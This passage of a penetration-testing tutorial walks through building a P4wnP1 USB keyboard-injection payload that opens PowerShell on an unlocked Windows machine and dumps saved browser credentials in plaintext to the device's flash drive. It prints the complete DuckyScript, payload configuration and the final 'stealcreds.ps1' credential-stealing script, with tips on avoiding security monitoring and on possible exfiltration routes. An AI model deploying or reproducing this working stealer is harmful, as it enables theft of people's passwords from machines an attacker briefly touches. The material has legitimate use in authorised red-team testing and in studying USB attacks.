After entering the credentials, Edge should pop up a dialog, asking to store them. The screenshot shows this dialog in 

German language. Please note that you don’t necessarily have to use real credentials (and maybe shouldn’t).
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Illustration 4: PowerShell script to print browser credentials in action

Illustration 5: Twitter login with Edge browser
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The dialog shown above has to be confirmed with yes, in order to store the password.

The next two illustrations show the same procedure for Facebook. Instead of confirming the dialog to store creden-

tials, it was declined for facebook.com. As shown in the script output earlier, the password is indeed empty, but the us-

ername entered for Facebook login is stored anyway. In red teaming tasks or penetration tests, these stored account 

names are a good starting point for password brute forcing.

Bring up the initial payload

Our goal is to execute the script given above with P4wnP1 (we care about storing the result later). This essentially 

means we have to be able to execute PowerShell code on our target machine. The easiest way to achieve this is to use 

P4wnP1 capabilities to emulate a keyboard. From this point we could use simple keyboard commands to open a Power-

Shell process and type out the lines of our script, one by one. Of course, this could be done in a single line too - using 

powershell.exe with proper command line parameters. To keep a long story short, several arguments exist to not 

choose the second approach. Among others, these are:

• command line parameters like “-EncodedCommand”, “-ExecutionPolicy bypass”, “-NoProfile, “-hid-

den” and so on are likely to trigger several security and monitoring solutions.

• omitting command line arguments like “-NoProfile”, on the other hand, raises the chance that the script 

fails.

• the maximum length of a command line is fairly restricted and it could get hard to shrink complex scripts to fit 

into such a line.
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Illustration 6: Edge browser asks to store credentials (confirmed)

Illustration 7: Facebook login with Edge browser

Illustration 8: Edge browser asks to store credentials for facebook.com (declined)
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On the other hand, entering the commands into a running PowerShell:

• Is visible to the user, which is a minor issue, as we are going to type very fast. It should be mentioned that ad-

vanced methods exist to hide an interactive PowerShell Window during typing with some lines of code. Al-

though this is out of scope in this article, the “hid_backdoor” payload is able to do it.

• Running the commands doesn’t get blocked by a restrictive PowerShell execution policy, as we don’t load a Pow-

erShell script (we type it out from scratch).

Now that we are clear on how to go on, we use PuTTY to get network based access to P4wnP1. It is recommended to 

start with the “network_only” payload, in order to achieve this (network_only is the default payload on a fresh P4wnP1 

installation).

After having logged in with “pi@172.16.0.1”, we change into the payloads subdirectory of the P4wnP1 installa-

tion folder. Running “ls -l” should look like what is shown in the next screenshot.

Next, we create a dedicated subdirectory for our new payload, which we call “hakin9”. The first file we create in this 

new folder is the text file “stealcreds.ps1” which should hold the PowerShell script we discussed already.

As shown in the next screenshot, I use nano to edit the PowerShell file. The content is exactly the same like shown in 

Listing 1. It is important to add an empty line in the end to force P4wnP1 to issue the RETURN key after the last line 

later on.
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Illustration 9: Directory listing of P4wnP1 payload folder (fresh installation)

Illustration 10: Creating a subfolder for the new payload and a file holding the PowerShell script
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   In 

the next step, we use nano again to create a second file, named “startps.duck”, like shown in the screenshot.

DuckyScript is a scripting language for keyboard payloads, which is used by Hak5’s RubberDucky. As this language is 

easy and widely known, it could, of course, be used with P4wnP1 keyboard attacks. A full explanation of DuckyScript is 

out of scope in this tutorial, but the content of “startps.duck” should be discussed, anyway.
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Illustration 11: Saving the PowerShell script to "stealcreds.ps1

Illustration 12: Checking the content of the new file

Illustration 13: Create DuckyScript to bring up PowerShell in "startps.duck"
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The first line is a key sequence, 

serving the purpose of pressing 

<Windows Key> + <R>. This is 

the shortcut to bring up the 

built-in execute dialog of win-

dows. The second line adds a 500 millisecond delay before input continues. The purpose of “STRING” command in the 

third line is to print out all follow up characters via keyboard. Thus “powershell.exe” will be entered into the execute 

dialog. This is followed by the RETURN key, which is represented by “ENTER” in the 4th line. The 1000 millisecond 

delay in the 5th line of the script is the most important one and could be the cause of a failing payload. The delay 

pauses the final payload for one second before typing goes on. As the next step of our payload will be to print out our 

PowerShell code, it would badly fail if the, now started, PowerShell session isn’t ready to receive input. So the target 

has one second to get PowerShell input ready, otherwise the follow up characters are typed out to nowhere or only par-

tially. This should be kept in mind: If the target is too slow to open up the PowerShell session fast enough, this delay 

should be increased.

Note: There’s no need for an initial delay in the first line, as P4wnP1 won’t start typing before the target is ready to re-

ceive keyboard input (in contrast to a RubberDucky). Anyway, the keyboard obviously has no feedback channel to re-

port back if the started PowerShell process is running.

Up till now, we still have no payload. So let’s create one in a third file called “payload.txt” to glue everything to-

gether.

241

Listing 2: Content of “startps.duck”

1
2
3
4
5

GUI r
DELAY 500
STRING powershell.exe
ENTER
DELAY 1000

Illustration 14: The actual payload, saved to "payload.txt"
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Line 4 and 5 of the payload define the USB Vendor ID and Product ID to use. It is important to understand, that Win-

dows caches drivers based on these IDs. This means if you change the USB setup later on (adding a new device inter-

face), it is likely that Windows fails to install the drivers correctly if the VID and PID have already been used for a dif-

ferent device. To make a long story short: if changes of the device configuration are introduced to a payload, at least 

the PID should be changed, too.

Line 6 disables the CDC ECM interface, which would otherwise be enabled by default. 

Line 7 enables the RNDIS interface – this network interface isn’t needed for our final payload, but it allows us to ac-

cess P4wnP1 through SSH, during development. RNDIS should be disabled after payload development is finished (and 

the PID should be changed, to force Windows to reinstall drivers).

Line 8 enables the HID keyboard, which is needed to carry out the attack.

Line 13 is very important. As stated in the payload comments, the “lang” parameter is responsible for the keyboard lay-

out language used by the HID keyboard. THIS OPTION HAS TO FIT THE TARGET’S KEYBOARD LAYOUT, OTHER-

WISE WRONG CHARACTERS ARE TYPED OUT. In my case, the layout is set to “de”, which means German keyboard 

layout.

The function header “onKeyboardUp” in line 15 represents the entry point of a predefined callback functions available 

for P4wnP1 payloads. To get more details on these callback function, a payload called “template.txt” is shipped 
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Listing 3: Content of "payload.txt"

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

# =============================
# USB setup
# =============================
USB_VID="0x1d6b"  # Vendor ID
USB_PID="0x1001"  # Product ID
USE_ECM=false    # we need no Linux/Mac networking
USE_RNDIS=true   # RNDIS network device to enable hash stealing
USE_HID=true    # HID keyboard to allow entering cracked password

# Keyboard language for outhid and duckhid commands
# possible languages: "be", "br", "ca", "ch", "de", "dk", "es", "fi",
#    "fr", "gb", "hr", "it", "no", "pt", "ru", "si", "sv", "tr", "us"
lang="de" # MAKE THE KEYBOARD LANGUAGE MATCH THE TARGET

function onKeyboardUp()
{
    # execute DuckyScript responsible for bringing up PowerShell
    cat $wdir/payloads/hakin9/startps.duck | duckhid

    # print out the PowerShell script as raw ASCII
    # Note: The script has to end with an empty line, to force 
    # pressing RETURN after the last line
    cat $wdir/payloads/hakin9/stealcreds.ps1 | outhid
}
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with P4wnP1, including comments on callbacks. The “onKeyboardUp” function body gets executed, as soon as the tar-

get has the keyboard drivers up and running (for this reason no initial delay is needed in the DuckyScript).

Line 18 pipes the content of out “startps.duck” DuckyScript to the “duckhid” command. This command again exe-

cutes the DuckyScript, with respect to the keyboard language chosen in line 13.

It should be noted, that “startps.duck” isn’t referenced with an absolute path, but relative to “$wdir”. This is a 

built-in variable available to all callback functions, representing the directory where P4wnP1 has been installed.

Line 23, finally, is very similar to line 18, but uses the “outhid” command instead of “duckhid”. As the file 

“stealcreds.ps1” contains raw ASCII instead of DuckyScript, this command comes to help. It works with respect to 

the “lang” option, too.

Note: As “outhid” accepts raw ASCII it is possible to pipe other text files or results of commands with ASCII 

output into it, which ultimately results in P4wnP1 typing it out through the HID keyboard.

At this point we are nearly done, but our payload isn’t activated. Before we do so, we recheck the content of the newly 

created payload folder “hakin9”:

 

The final step is to activate the new payload. This is done in P4wnP1’s main configuration file “setup.cfg”, which re-

sides in P4wnP1’s main folder.

To enable the payload, we have to change the “PAYLOAD” parameter in setup.cfg. The payload path has to be en-

tered as relative path to P4wnP1’s payloads folder, which means “hakin9/payload.txt” in our case. 

Important: Only one payload can be active at once.
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Illustration 15: Checking the content of the new payload folder for completeness

Illustration 16: Changing to P4wnP1's main folder, to edit global configuration "setup.cfg"
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Restarting P4wnP1 should trigger our payload if nothing went wrong. Before we do so, one more note on “setup.cfg”.

As stated, “setup.cfg” is the main configuration file. Every option usable in payloads (like lang, USB_VID, 

USB_PID and so on) is present in this file, too. It is important to know that options defined in the current pay-

load have priority over options defined in “setup.cfg”. If a payload omits an option, the setting from 

setup.cfg would be used. For this reason we had to disable “USE_ECM” for example, as it is enabled in setup.cfg. 

If one writes multiple keyboard payloads, on the other hand, it would be a good idea to omit the “lang” option in the 

payloads and choose it globally in “setup.cfg”.

So let’s stop talking and reboot P4wnP1:

The next screenshot shows what happened on the desktop of my test machine, after P4wnP1 has finished booting and 

the target installed the keyboard driver. The screenshot is very similar to the one with the PowerShell script test done 

earlier, but slightly differs. The execution folder is the home directory of my test user “XMG-U705” and his credentials 

are the ones printed out.
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Illustration 17: Update setup.cfg to use the new payload

Illustration 18: Reboot P4wnP1
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SUCCESS!

At this point we have to deal with a small issue caused by Windows. As already explained, we left RNDIS enabled to 

keep network access to P4wnP1. The next screenshot shows that the RNDIS adapter is up and running.

The adapter hasn’t got an IP configured. Although a DHCP server is running on P4wnP1, the IP being used (172.16.0.2 

by default), has already been assigned to the RNDIS adapter of the “network_only” payload, we ran before. Win-

dows keeps this IP reserved, although the old adapter isn’t present anymore (used a different VID and PID combina-

tion). So we have to reset the IP configuration for the new RNDIS adapter manually:

If you ran into the same issue, Windows asks for confirmation to reassign the IP to a new adapter, because it is cur-

rently used by another one. Doing so P4wnP1 should be accessible via SSH again.

Finalizing the payload – store the output to P4wnP1

Our final goal is to store the output of the PowerShell script to P4wnP1, which could be achieved in several ways:

• Keep RNDIS enabled and bring up an FTP server on P4wnP1, to which the script result gets exfiltrated
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Illustration 19: Payload executed successfully

Illustration 20: P4wnP1 RNDIS adapter

Illustration 21: Manually reassigning the correct IP to P4wnP1's RNDIS adapter
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• use WEBDAV instead of FTP

• use a Webserver instead (could for instance done by encoded HTTP GET requests, which end up in the log of 

the webserver)

To keep things simple, we use the USB mass storage support of P4wnP1 to store the script output. The advantage of 

this approach: network traffic is “loud”, has to pass the firewall and is likely to get logged, while bringing up a new net-

work interface could be stopped by endpoint protection on a real target. Considering Endpoint Protection, of course, 

unknown USB Mass Storage Devices could get blocked, too. This is why payloads could be built according to the needs 

of an engagement or pentest.

And here is the base idea for the payload extension:

• enable USB Mass Storage support (UMS) for the payloads

• extend the PowerShell script to save output to the USB mass storage and exit afterwards

The idea introduces a small problem. In order to save something to P4wnP1’s mass storage, we have to choose a desti-

nation based on the drive letter. Unfortunately, the drive letter is assigned during runtime of the payload, but we have 

to define it upfront. As I’m sure most of us aren’t clairvoyants, we need to find a solution for this problem. And, no sur-

prise, there exists a solution called: drivelabel!

If we define a unique drive label for the UMS, we should be able to search for it from PowerShell and translate it into 

the current drive letter in use.

As P4wnP1’s UMS capabilities are still under development, a drive label isn’t predefined. So we use a small trick to as-

sign a custom one from our payload:
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There hasn’t been much added to the payload to make UMS work. Lines changed are marked in red:

Line 13 enables mass storage support (in current implementation of P4wnP1 this is a 128 MB writable storage. 

CDROM support and additional configurations are on the ToDo list of the project).

In line 9 a new PID has been chosen, to force Windows to reinstall drivers for the new USB composite device (as ex-

plained earlier, this is needed if basic USB configuration is changed).

Line 2 defines a bash variable, holding our drive label, which is “HAKIN9” in this case. Drive labels up to 11 characters 

are supported.

Line 3 is where the magic happens: the tool “flabel” is used to set a new label for “$wdir/USB_STORAGE/

image.bin”. This is the image of the 128MB file, which backs P4wnP1’s UMS device.

Rebooting P4wnP1, the Windows target should detect a new flash drive, while the keyboard payload still executes.
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Listing 4: Payload with UMS support and custom drive label added

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

# assign custom drivelabel to UMS
UMSLABEL="HAKIN9"
fatlabel $wdir/USB_STORAGE/image.bin $UMSLABEL

# =============================
# USB setup
# =============================
USB_VID="0x1d6b"  # Vendor ID
USB_PID="0x1002"  # Product ID
USE_ECM=false    # we need no Linux/Mac networking
USE_RNDIS=true   # RNDIS network device to enable hash stealing
USE_HID=true    # HID keyboard to allow entering cracked password
USE_UMS=true # enable USB Mass Storage

# Keyboard language for outhid and duckhid commands
# possible languages: "be", "br", "ca", "ch", "de", "dk", "es", "fi",
#    "fr", "gb", "hr", "it", "no", "pt", "ru", "si", "sv", "tr", "us"
lang="de" # MAKE THE KEYBOARD LANGUAGE MATCH THE TARGET

function onKeyboardUp()
{
    # execute DuckyScript responsible for bringing up PowerShell
    cat $wdir/payloads/hakin9/startps.duck | duckhid

    # print out the PowerShell script as raw ASCII
    # Note: The script has to end with an empty line, to force 
    # pressing RETURN after the last line
    cat $wdir/payloads/hakin9/stealcreds.ps1 | outhid
}
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Note: As we again introduced a new RNDIS adapter, the IP 172.16.0.2 has to be reassigned manually (same 

procedure as described before), to allow SSH access to P4wnP1.

The missing step is to add up the logic to the PowerShell script “stealcreds.ps1” which is responsible for storing 

our output to P4wnP1’s flash drive.

Again changes to the former script have been marked in red.

Line 2 of “stealcreds.ps1” runs a while loop, waiting for $drivefound to become true, which is set to false in line 1.
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Illustration 22: P4wnP1 flash drive with custom label

Listing 5: Final version of "stealcreds.ps1"

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

$drivefound=$false

while (-not $drivefound)

{

  try

  {

    $drive=Get-Volume -FileSystemLabel "HAKIN9" -ErrorAction Stop

  }

  catch

  {

    "Waiting for P4wnP1 drive"

    sleep 1

    continue

  }

  $dl=($drive.DriveLetter | Out-String)[0] +":"

  $drivefound=$true

}

$filename=$dl+"\"+$env:COMPUTERNAME+"_"+$env:USERNAME+".txt"

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,

ContentType=WindowsRuntime]

$creds = (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll()

foreach ($c in $creds) {$c.RetrievePassword()}

$creds | Format-List -Property Resource,UserName,Password | Out-File $filename

exit
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Line 6 runs the PowerShell CmdLet “Get-Volume”, which essentially tries to find a volume called HAKIN9. This 

CmdLet is wrapped into a try-catch block with “Stop” chosen as ErrorAction. This means if no drive with this label is 

found, we end up in line 10. Lines 10 to 12 are responsible for printing out “Waiting for P4wnP1 drive”, sleep one sec-

ond and restart the while loop without further execution. If “Get-Volume” in line 6 succeeds, the resulting object gets 

stored in the variable $drive. Line 14 is responsible to extract the drive letter from this object and to append an “:” 

before storing it to the variable $dl. Depending on the real drive letter for the P4wnP1 UMS, something like “E:” is 

stored in $dl at this point. Line 15 exits the loop, by setting $drivefound to true.

Line 17 grabs the drive letter found and builds up a string, containing the computer name and user name of the target. 

The result is stored in $filename and adds up to something like “e:\computername_username.txt”. Lines 19 to 

21 are unchanged and contain the logic to retrieve the credentials (line 19 is wrapped, because it doesn’t fit into a sin-

gle line of the listing – the line break has to be removed in the real script). Line 22 is responsible for printing out the 

table with the credentials. The former output is piped to the “Out-File” CmdLet, which again stores the output to the 

file defined with $filename.

Line 23, finally, calls exit to close the PowerShell window when the work is done.

After rebooting P4wnP1, the payload needs 1 to 2 seconds to execute, once the keyboard driver is up. The PowerShell 

window is closed immediately and the flash drive labeled “HAKIN9” ends up with this content:
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Illustration 23: P4wnP1 flash drive, after the payload finished execution
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A file called “DESKTOP-4CDILFI_XMG-U705.txt” got stored to the P4wnP1 flash drive. The content of the file should be well 

known, meanwhile. The hostname of my test machine is “DESKTOP-4CDILFI” and the username of the test user is “XMG-

U705”. So everything works like intended.

Congratulations: If you made it up till here, you developed a neat credential stealer, which could be used during penetration 

tests if physical access to unlocked Windows machines is granted.

Further improvements

The payload shown has much room for improvement, which should be left to the reader. P4wnP1 is a flexible tool, us-

ing it effectively depends on the ideas of the pentester writing its payloads.

Some ideas to improve the given payload:

• The drive label “HAKIN9” is hardcoded in two files (payload.txt, stealcreds.ps1), although it is defined in the 

bash variable UMSLABEL. This could be used in conjunction with “outhid” command, to output the correct 

PowerShell script dynamically.

• The PowerShell script contains much formatting and long variable names, to keep it readable. Anyway, this 

isn’t needed for it to work. Stripping down the script increases speed of keyboard type out and thus speed of 

payload execution.

• If the payload is run against the same host and user name, the credential file gets overwritten (same name). It’s 

a good idea to append a counter to the filename, in case it exists already – otherwise, information could get lost 

if the same target is compromised multiple times.

• The built-in “key_trigger” command could be used to avoid the payload executing automatically. Instead, it 

could be triggered by key presses to CAPSLOCK, for example. Even running different payload branches is possi-

ble with that. The approach is shown in the “hid_keyboard2.txt” payload which is packed with P4wnP1.

Conclusion

P4wnP1 is a powerful framework, allowing one to carry out most kinds of state of the art USB device attacks. It is 

highly customizable, what can be done with it depends only on the imagination of the person writing the payloads. The 

project development is ongoing and the community growing. The best thing about P4wnP1 is that it is completely open 

source and the basic hardware comes at costs between $5 and $10 USD. Thus it is a replacement for those expensive 

USB gadgets out there, which is worth trying.
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